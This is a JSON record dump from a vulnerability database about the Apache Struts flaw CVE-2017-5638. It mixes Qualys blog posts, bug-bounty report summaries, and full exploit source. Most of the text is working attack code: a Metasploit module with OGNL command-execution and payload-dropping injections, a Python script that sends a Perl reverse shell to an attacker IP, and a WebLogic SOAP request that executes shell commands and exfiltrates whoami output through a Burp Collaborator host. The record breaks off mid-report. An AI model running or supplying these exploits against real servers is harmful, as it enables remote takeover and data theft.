context and insight, including progress against goals. Via VM\u2019s APIs, the reporting data can be integrated with other security and compliance systems.\n\nWhen VM is paired with the Qualys Continuous Monitoring (CM) app, you\u2019ll be alerted about potential threats \u2014 such as new hosts/OSes, expiring certificates, unexpected open ports and unauthorized software \u2014 so problems can be tackled before turning into breaches. \n\n_Qualys Threat Protection_\n\nTo prioritize remediation work, you must continuously correlate vulnerability disclosures with your organization\u2019s IT asset inventory, so that you get a clear picture of the vulnerabilities that exist in each IT asset.\n\nThis is what [Qualys Threat Protection (TP)](<https://www.qualys.com/apps/threat-protection/?utm_source=website&utm_medium=blog&utm_campaign=demand-gen&utm_term=forrester-vulnerability-prioritization-q1-2018&utm_content=trial&leadsource=344565181>) does, and more.\n\n\n\nQualys TP continuously correlates external real-time threat indicators (RTIs) against your internal vulnerabilities and IT asset data, so you can take full control of evolving threats and identify what to remediate first.\n\n\u201cWhat ties this all together is Qualys Threat Protection,\u201d Graham said.\n\nRTIs add valuable context to a vulnerability, such as whether: \n\n * It\u2019s being actively attacked in the wild\n * There\u2019s an exploit kit available for it\n * It can lead to high data loss or to a denial of service attack\n * It\u2019s a \u201czero day\u201d with no patch available\n\nRegarding IT assets, you should consider factors such as their role in business operations, their interconnectedness with other assets, their Internet exposure and their user base.\n\nOut of this type of in-depth analysis will emerge a clear picture of your threat landscape, and based on it, you\u2019ll be able to come up with an accurate remediation plan.\n\nQualys TP features include:\n\n * Robust Data Analysis\n\nQualys TP continuously correlates external threat information against your vulnerabilities and IT asset inventory, leveraging Qualys Cloud Platform\u2019s robust back-end engine to automate this large-scale and intensive data analysis process. \n\n * Live Threat Intelligence Feed\n\nAs Qualys engineers continuously validate and rate new threats from internal and external sources, Qualys TP\u2019s Live Threat Intelligence Feed displays the latest vulnerability disclosures and maps them to your impacted IT assets. You can see the number of assets affected by each threat, and drill down into asset details.\n\nQualys Threat Protection, working in tandem with [Qualys AssetView](<https://www.qualys.com/apps/asset-inventory/?utm_source=website&utm_medium=blog&utm_campaign=demand-gen&utm_term=forrester-vulnerability-prioritization-q1-2018&utm_content=trial&leadsource=344565181>) and [Qualys Vulnerability Management](<https://www.qualys.com/apps/vulnerability-management/?utm_source=website&utm_medium=blog&utm_campaign=demand-gen&utm_term=forrester-vulnerability-prioritization-q1-2018&utm_content=trial&leadsource=344565181>), helps you to proactively and continuously detect assets and vulnerabilities, and prioritize remediation in your IT environment.\n\n_Watch a recording of the [webcast](<https://www.qualys.com/webcasts/prioritization-vulnerabilities-modern-it-environment/?utm_source=website&utm_medium=blog&utm_campaign=demand-gen&utm_term=forrester-vulnerability-prioritization-q1-2018&utm_content=webcast&leadsource=344565181>), which has a lot more details, a demo of Qualys Threat Protection, and a Q&amp;A session with the audience._", "cvss3": {}, "published": "2018-05-07T16:00:10", "type": "qualysblog", "title": "How To Prioritize Vulnerabilities in a Modern IT Environment", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-05-07T16:00:10", "id": "QUALYSBLOG:5C311FA52DD78D7015076D492F321DB0", "href": "https://blog.qualys.com/news/2018/05/07/how-to-prioritize-vulnerabilities-in-a-modern-it-environment", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-05-01T13:43:00", "description": "Today Oracle released a total of [299 new security fixes](<http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html>) across all product families. It is important to note that it fixed 25 instances of the infamous [Apache Struts vulnerability](<https://blog.qualys.com/securitylabs/2017/03/14/apache-struts-cve-2017-5638-vulnerability-and-the-qualys-solution>) which could allow a remote attacker to take complete control of the server running Struts. The struts fix was applied to 19 instances of Oracle Financial Services Applications along with WebCenter, WebLogic, Siebel, Oracle Communications, MySQL and Oracle Retail.\n\nOracle also released [Patch 25878798](<https://updates.oracle.com/download/25878798.html>) for Solaris 10 and 11.3 which fixed the second [Shadow Brokers](<https://blog.qualys.com/securitylabs/2017/04/15/the-shadow-brokers-release-zero-day-exploit-tools>) EXTREMEPARR vulnerability CVE-2017-3622. EXTREMEPARR has a CVSS Base Score of 7.8, and if successfully exploited allows a local privilege escalation in the \u2018dtappgather\u2019 component. The other Shadow Brokers vulnerability CVE-2017-3623 (a.k.a. \u201cEbbisland\u201d or \u201cEbbshave\u201d) was previously addressed by Oracle in several Solaris 10 patch distributions issued since January 26th 2012 and does not affect Solaris 11.\n\nOut of the 299 total fixes MySQL, Financial Services, Retail and Fusion Middleware take the lion\u2019s share of fixes and the distribution is shown in the chart below. Majority of the vulnerabilities in the Financial Services, Retail and Fusion Middleware could be exploited via the HTTP protocol and attackers can take complete control of the system remotely without the need of any credentials.\n\n\n\n \n\nIn databases, MySQL has seen its share of vulnerabilities rise drastically as compared to the Oracle Database server and today\u2019s release was no different with 39 MySQL bugs fixed out of which 11 could be remotely exploitable without authentication. This is a large number as compared to just 3 bugs in the Oracle Database Server. All vulnerabilities for MySQL could be exploited using the MySQL protocol used by clients to connect to the database server and organizations should create a details inventory of their MySQL servers for their exposure within the organization and outside.\n\nJava SE was patched with 8 security fixes out of which 7 are exploitable remotely without authentication. AWT, JCE and other java networking components were affect and could be exploited using FTP, SMTP and multiple other protocols. 21 Sun systems products were patched which included Solaris, Sun ZFS Storage Appliance and Solaris Cluster. Out of these, 8 vulnerabilities can be exploitable remotely. The most affected component in Oracle Linux was the Oracle VM Virtual Box and 6 of these issues are remotely exploitable.\n\nThe chart below shows a list of remotely exploitable vulnerabilities in today's release:\n\n\n\nOverall, this was another large security update with 299 fixes from Oracle touching all product lines, fixing Apache Struts embedded into products and patching a total of 162 remotely exploitable vulnerabilities.", "cvss3": {}, "published": "2017-04-18T21:39:53", "title": "Oracle Plugs Struts and Shadow Brokers hole along with 299 Total Vulnerabilities", "type": "qualysblog", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-3622", "CVE-2017-5638", "CVE-2017-3623"], "modified": "2017-04-18T21:39:53", "href": "https://blog.qualys.com/laws-of-vulnerabilities/2017/04/18/oracle-plugs-struts-hole-along-with-299-total-vulnerabilities", "id": "QUALYSBLOG:110CC96D8440CC2A1EA0521D300634ED", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2017-03-15T01:15:35", "description": "", "cvss3": {}, "published": "2017-03-14T00:00:00", "type": "packetstorm", "title": "Apache Struts Jakarta Multipart Parser OGNL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-14T00:00:00", "id": "PACKETSTORM:141630", "href": "https://packetstormsecurity.com/files/141630/Apache-Struts-Jakarta-Multipart-Parser-OGNL-Injection.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::EXE \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Apache Struts Jakarta Multipart Parser OGNL Injection', \n'Description' => %q{ \nThis module exploits a remote code execution vunlerability in Apache Struts \nversion 2.3.5 - 2.3.31, and 2.5 - 2.5.10. Remote Code Execution can be performed \nvia http Content-Type header. \n \nNative payloads will be converted to executables and dropped in the \nserver's temp dir. If this fails, try a cmd/* payload, which won't \nhave to write to the disk. \n}, \n'Author' => [ \n'Nike.Zheng', # PoC \n'Nixawk', # Metasploit module \n'Chorder', # Metasploit module \n'egypt', # combining the above \n'Jeffrey Martin', # Java fu \n], \n'References' => [ \n['CVE', '2017-5638'], \n['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-045'] \n], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Universal', { \n'Platform' => %w{ unix windows linux }, \n'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ], \n}, \n], \n], \n'DisclosureDate' => 'Mar 07 2017', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOpt::RPORT(8080), \nOptString.new('TARGETURI', [ true, 'The path to a struts application action', '/struts2-showcase/' ]), \n] \n) \nregister_advanced_options( \n[ \nOptString.new('HTTPMethod', [ true, 'The HTTP method to send in the request. Cannot contain spaces', 'GET' ]) \n] \n) \n \n@data_header = \"X-#{rand_text_alpha(4)}\" \nend \n \ndef check \nvar_a = rand_text_alpha_lower(4) \n \nognl = \"\" \nognl << %q|(#os=@java.lang.System@getProperty('os.name')).| \nognl << %q|(#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('|+var_a+%q|', #os))| \n \nbegin \nresp = send_struts_request(ognl) \nrescue Msf::Exploit::Failed \nreturn Exploit::CheckCode::Unknown \nend \n \nif resp && resp.code == 200 && resp.headers[var_a] \nvprint_good(\"Victim operating system: #{resp.headers[var_a]}\") \nExploit::CheckCode::Vulnerable \nelse \nExploit::CheckCode::Safe \nend \nend \n \ndef exploit \ncase payload.arch.first \n#when ARCH_JAVA \n# datastore['LHOST'] = nil \n# resp = send_payload(payload.encoded_jar) \nwhen ARCH_CMD \nresp = execute_command(payload.encoded) \nelse \nresp = send_payload(generate_payload_exe) \nend \n \nrequire'pp' \npp resp.headers if resp \nend \n \ndef send_struts_request(ognl, extra_header: '') \nuri = normalize_uri(datastore[\"TARGETURI\"]) \ncontent_type = \"%{(#_='multipart/form-data').\" \ncontent_type << \"(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).\" \ncontent_type << \"(#_memberAccess?\" \ncontent_type << \"(#_memberAccess=#dm):\" \ncontent_type << \"((#container=#context['com.opensymphony.xwork2.ActionContext.container']).\" \ncontent_type << \"(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).\" \ncontent_type << \"(#ognlUtil.getExcludedPackageNames().clear()).\" \ncontent_type << \"(#ognlUtil.getExcludedClasses().clear()).\" \ncontent_type << \"(#context.setMemberAccess(#dm)))).\" \ncontent_type << ognl \ncontent_type << \"}\" \n \nheaders = { 'Content-Type' => content_type } \nif extra_header \nheaders[@data_header] = extra_header \nend \n \n#puts content_type.gsub(\").\", \").\\n\") \n#puts \n \nresp = send_request_cgi( \n'uri' => uri, \n'method' => datastore['HTTPMethod'], \n'headers' => headers \n) \n \nif resp && resp.code == 404 \nfail_with(Failure::BadConfig, 'Server returned HTTP 404, please double check TARGETURI') \nend \nresp \nend \n \ndef execute_command(cmd) \nognl = '' \nognl << %Q|(#cmd=@org.apache.struts2.ServletActionContext@getRequest().getHeader('#{@data_header}')).| \n \n# You can add headers to the server's response for debugging with this: \n#ognl << %q|(#r=#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']).| \n#ognl << %q|(#r.addHeader('decoded',#cmd)).| \n \nognl << %q|(#os=@java.lang.System@getProperty('os.name')).| \nognl << %q|(#cmds=(#os.toLowerCase().contains('win')?{'cmd.exe','/c',#cmd}:{'/bin/sh','-c',#cmd})).| \nognl << %q|(#p=new java.lang.ProcessBuilder(#cmds)).| \nognl << %q|(#p.redirectErrorStream(true)).| \nognl << %q|(#process=#p.start())| \n \nsend_struts_request(ognl, extra_header: cmd) \nend \n \ndef send_payload(exe) \n \nognl = \"\" \nognl << %Q|(#data=@org.apache.struts2.ServletActionContext@getRequest().getHeader('#{@data_header}')).| \nognl << %Q|(#f=@java.io.File@createTempFile('#{rand_text_alpha(4)}','.exe')).| \n#ognl << %q|(#r=#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']).| \n#ognl << %q|(#r.addHeader('file',#f.getAbsolutePath())).| \nognl << %q|(#f.setExecutable(true)).| \nognl << %q|(#f.deleteOnExit()).| \nognl << %q|(#fos=new java.io.FileOutputStream(#f)).| \n \n# Using stuff from the sun.* package here means it likely won't work on \n# non-Oracle JVMs, but the b64 decoder in Apache Commons doesn't seem to \n# work and I don't see a better way of getting binary data onto the \n# system. =/ \nognl << %q|(#d=new sun.misc.BASE64Decoder().decodeBuffer(#data)).| \nognl << %q|(#fos.write(#d)).| \nognl << %q|(#fos.close()).| \n \nognl << %q|(#p=new java.lang.ProcessBuilder({#f.getAbsolutePath()})).| \nognl << %q|(#p.start()).| \nognl << %q|(#f.delete())| \n \nsend_struts_request(ognl, extra_header: [exe].pack(\"m\").delete(\"\\n\")) \nend \n \nend \n \n=begin \nDoesn't work: \n \nognl << %q|(#cl=new java.net.URLClassLoader(new java.net.URL[]{#f.toURI().toURL()})).| \nognl << %q|(#c=#cl.loadClass('metasploit.Payload')).| \nognl << %q|(#m=@ognl.OgnlRuntime@getMethods(#c,'main',true).get(0)).| \nognl << %q|(#r.addHeader('meth',#m.toGenericString())).| \nognl << %q|(#m.invoke(null,null)).| \n \n#ognl << %q|(#m=#c.getMethod('run',@java.lang.Class@forName('java.lang.Object'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0 \n#ognl << %q|(#m=#c.getMethod('run',@java.lang.Class@forName('java.lang.String'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0 \n#ognl << %q|(#m=#c.getMethod('run',@java.lang.Class@forName('[Ljava.lang.Object;'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0 \n#ognl << %q|(#m=#c.getMethod('run',@java.lang.Class@forName('[Ljava.lang.String;'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0 \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{})).| \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('java.lang.Object')})).| \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('java.lang.String')})).| \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('java.lang.String')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@16e2d926 \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.Object;')})).| \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@684b3dfd \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{null})).| \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@java.lang.Class@forName('java.lang.Object')})).| \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@java.lang.Class@forName('java.lang.String')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@16e2d926 \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@java.lang.Class@forName('[Ljava.lang.Object;')})).| \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@java.lang.Class@forName('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@684b3dfd \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@4b232ba9 \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@4b232ba9 \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@4fee2899 \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[])).| # parse failed \n#ognl << %q|(#m=#c.getMethod('run',null)).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@50af0cd6 \n \n#ognl << %q|(#m=#c.getMethod('main',@java.lang.Class@forName('java.lang.Object'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0 \n#ognl << %q|(#m=#c.getMethod('main',@java.lang.Class@forName('java.lang.String'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0 \n#ognl << %q|(#m=#c.getMethod('main',@java.lang.Class@forName('[Ljava.lang.Object;'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0 \n#ognl << %q|(#m=#c.getMethod('main',@java.lang.Class@forName('[Ljava.lang.String;'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@2231d3a9 \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{})).| \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('java.lang.Object')})).| \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('java.lang.String')})).| \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.Object;')})).| \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@684b3dfd \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{null})).| \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@java.lang.Class@forName('java.lang.Object')})).| \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@java.lang.Class@forName('java.lang.String')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@16e2d926 \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@java.lang.Class@forName('[Ljava.lang.Object;')})).| \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@java.lang.Class@forName('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@16e2d926 \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@5f78809f \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@4b232ba9 \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@56c6add5 \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[])).| # parse failed \n#ognl << %q|(#m=#c.getMethod('main',null)).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@1722884 \n \n=end \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/141630/struts2_content_type_ognl.rb.txt"}, {"lastseen": "2017-03-12T01:15:38", "description": "", "cvss3": {}, "published": "2017-03-10T00:00:00", "type": "packetstorm", "title": "Apache Struts 2 2.3.x / 2.5.x Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-10T00:00:00", "id": "PACKETSTORM:141576", "href": "https://packetstormsecurity.com/files/141576/Apache-Struts-2-2.3.x-2.5.x-Remote-Code-Execution.html", "sourceData": "`# CVE-2017-5638 \n# Apache Struts 2 Vulnerability Remote Code Execution \n# Reverse shell from target \n# Author: anarc0der - github.com/anarcoder \n# Tested with tomcat8 \n \n# Install tomcat8 \n# Deploy WAR file https://github.com/nixawk/labs/tree/master/CVE-2017-5638 \n \n# Ex: \n# Open: $ nc -lnvp 4444 \n# python2 struntsrce.py --target=http://localhost:8080/struts2_2.3.15.1-showcase/showcase.action --ip=127.0.0.1 --port=4444 \n \n\"\"\" \nUsage: \nstruntsrce.py --target=<arg> --ip=<arg> --port=<arg> \nstruntsrce.py --help \nstruntsrce.py --version \n \nOptions: \n-h --help Open help menu \n-v --version Show version \nRequired options: \n--target='url target' your target :) \n--ip='10.10.10.1' your ip \n--port=4444 open port for back connection \n \n\"\"\" \n \nimport urllib2 \nimport httplib \nimport os \nimport sys \nfrom docopt import docopt, DocoptExit \n \n \nclass CVE_2017_5638(): \n \ndef __init__(self, p_target, p_ip, p_port): \nself.target = p_target \nself.ip = p_ip \nself.port = p_port \nself.revshell = self.generate_revshell() \nself.payload = self.generate_payload() \nself.exploit() \n \ndef generate_revshell(self): \nrevshell = \"perl -e \\\\'use Socket;$i=\\\"{0}\\\";$p={1};\"\\ \n\"socket(S,PF_INET,SOCK_STREAM,getprotobyname(\\\"tcp\\\"));\"\\ \n\"if(connect(S,sockaddr_in($p,inet_aton($i)))){{open\"\\ \n\"(STDIN,\\\">&S\\\");open(STDOUT,\\\">&S\\\");\"\\ \n\"open(STDERR,\\\">&S\\\");exec(\\\"/bin/sh -i\\\");}};\\\\'\" \nreturn revshell.format(self.ip, self.port) \n \ndef generate_payload(self): \npayload = \"%{{(#_='multipart/form-data').\"\\ \n\"(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).\"\\ \n\"(#_memberAccess?\"\\ \n\"(#_memberAccess=#dm):\"\\ \n\"((#container=#context['com.opensymphony.xwork2.\"\\ \n\"ActionContext.container']).\"\\ \n\"(#ognlUtil=#container.getInstance(@com.opensymphony.\"\\ \n\"xwork2.ognl.OgnlUtil@class)).\"\\ \n\"(#ognlUtil.getExcludedPackageNames().clear()).\"\\ \n\"(#ognlUtil.getExcludedClasses().clear()).\"\\ \n\"(#context.setMemberAccess(#dm)))).\"\\ \n\"(#cmd='{0}').\"\\ \n\"(#iswin=(@java.lang.System@getProperty('os.name').\"\\ \n\"toLowerCase().contains('win'))).\"\\ \n\"(#cmds=(#iswin?{{'cmd.exe','/c',#cmd}}:\"\\ \n\"{{'/bin/bash','-c',#cmd}})).\"\\ \n\"(#p=new java.lang.ProcessBuilder(#cmds)).\"\\ \n\"(#p.redirectErrorStream(true)).(#process=#p.start()).\"\\ \n\"(#ros=(@org.apache.struts2.ServletActionContext@get\"\\ \n\"Response().getOutputStream())).\"\\ \n\"(@org.apache.commons.io.IOUtils@copy\"\\ \n\"(#process.getInputStream(),#ros)).(#ros.flush())}}\" \nreturn payload.format(self.revshell) \n \ndef exploit(self): \ntry: \n# Set proxy for debug request, just uncomment these lines \n# Change the proxy port \n \n#proxy = urllib2.ProxyHandler({'http': '127.0.0.1:8081'}) \n#opener = urllib2.build_opener(proxy) \n#urllib2.install_opener(opener) \n \nheaders = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64)' \n' AppleWebKit/537.36 (KHTML, like Gecko)' \n' Chrome/55.0.2883.87 Safari/537.36', \n'Content-Type': self.payload} \nxpl = urllib2.Request(self.target, headers=headers) \nbody = urllib2.urlopen(xpl).read() \nexcept httplib.IncompleteRead as b: \nbody = b.partial \nprint body \n \n \ndef main(): \ntry: \narguments = docopt(__doc__, version=\"Apache Strunts RCE Exploit\") \ntarget = arguments['--target'] \nip = arguments['--ip'] \nport = arguments['--port'] \nexcept DocoptExit as e: \nos.system('python struntsrce.py --help') \nsys.exit(1) \n \nCVE_2017_5638(target, ip, port) \n \n \nif __name__ == '__main__': \nmain() \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/141576/struntsrce.py.txt"}], "hackerone": [{"lastseen": "2023-06-05T15:45:32", "bounty": 0.0, "description": "A remote code execution (RCE) vulnerability was found on a DoD website which could have enabled an attacker to execute remote commands on the web server. @0daystolive and @dly were able to demonstrate this vulnerability by developing a custom script that caused the webserver to execute a benign command. This was a very clever demonstration. Thank you!", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-09T17:59:08", "type": "hackerone", "title": "U.S. Dept Of Defense: Remote Code Execution (RCE) in a DoD website", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-06-01T14:48:16", "id": "H1:212022", "href": "https://hackerone.com/reports/212022", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-05T15:45:32", "bounty": 0.0, "description": "A remote code execution (RCE) vulnerability was found on a DoD website which could have enabled an attacker to execute remote commands on the web server. @0daystolive and @dly were able to demonstrate this vulnerability by developing a custom script that caused the webserver to execute a benign command. This was a very clever demonstration. Thank you!", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-13T13:22:29", "type": "hackerone", "title": "U.S. Dept Of Defense: Remote Code Execution (RCE) in a DoD website", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-05-31T21:36:13", "id": "H1:213069", "href": "https://hackerone.com/reports/213069", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-05T15:45:04", "bounty": 0.0, "description": "A remote code execution (RCE) vulnerability was found on a DoD website which could have enabled an attacker to execute remote commands on the web server. Thank you @n0rb3r7 for notifying us of this vulnerability!\nI was able to leverage a recent, well-known vulnerability to achieve arbitrary, remote command execution on a U.S. Department Of Defense server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-13T04:14:12", "type": "hackerone", "title": "U.S. Dept Of Defense: Remote code execution vulnerability on a DoD website", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-07-03T18:23:05", "id": "H1:212985", "href": "https://hackerone.com/reports/212985", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-05T15:28:31", "bounty": 0.0, "description": "##Summary\n\nHello. I was able to identify RCE vulnerability due to the outdated Oracle Weblogic instance on `https://raebilling.mtn.co.za`.\n\n##Steps To Reproduce\n\n* To reproduce, try this request with BurpSuite \n* This request to the `https://raebilling.mtn.co.za/wls-wsat/RegistrationRequesterPortType` will trigger Remote OS Command Execution:\n\n```\nPOST /wls-wsat/RegistrationRequesterPortType HTTP/1.1\nHost: raebilling.mtn.co.za\nContent-Type: text/xml\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0,\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8,\nAccept-Languag: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3,\nContent-Type: text/xml;charset=UTF-8\nContent-Length: 873\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header>\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n <java>\n <object class=\"java.lang.ProcessBuilder\">\n <array class=\"java.lang.String\" length=\"3\">\n <void index=\"0\">\n <string>/bin/bash</string>\n </void>\n <void index=\"1\">\n <string>-c</string>\n </void>\n <void index=\"2\">\n <string>ping `whoami`.fexpwcppysiky1grj7mbodap5gb7zw.burpcollaborator.net</string>\n </void>\n </array>\n <void method=\"start\"/>\n </object>\n </java>\n </work:WorkContext>\n </soapenv:Header>\n <soapenv:Body/>\n </soapenv:Envelope>\n```\n==**Note:**== \n* **To reproduce this case with nslookup or ping, `fexpwcppysiky1grj7mbodap5gb7zw.burpcollaborator.net` host should be replaced by your own Burp Collaborator instance or with your private `VPS IP` to catch the DNS request**\n\n##_**Example:**_\n\n``` \nping 